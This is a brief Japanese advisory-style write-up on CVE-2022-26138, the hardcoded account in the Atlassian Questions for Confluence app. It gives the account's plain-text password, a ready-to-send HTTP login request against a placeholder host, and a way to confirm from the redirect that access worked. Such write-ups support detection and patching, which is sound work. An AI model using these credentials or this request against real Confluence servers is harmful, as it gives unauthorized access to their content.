
Atlassian Questions のハードコードされたパスワード (CVE-2022-26138)

Atlassian Questions For Confluence アプリ(Confluence Server および Data Center 向け)は、
confluence-users グループに属する Confluence ユーザーアカウントを、
ユーザー名 disabledsystemuser とハードコードされたパスワードで作成します。
このハードコードされたパスワードを知っているリモートの認証されていない攻撃者は、
これを悪用して Confluence にログインし、confluence-users グループのユーザーが
アクセスできるすべてのコンテンツにアクセスできる可能性があります。
このユーザーアカウントは、アプリのバージョン 2.7.34、2.7.35、および 3.0.2 をインストールする際に作成されます。
ハードコードされた認証情報:
disabledsystemuserdisabled1system1user6708POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded
os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action
サーバーが /vulnerable.action にリダイレクトした場合、認証情報は有効です。
ハードコードされた認証情報は、影響を受けるプラグインの jar ファイル内に平文で置かれていました。
https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar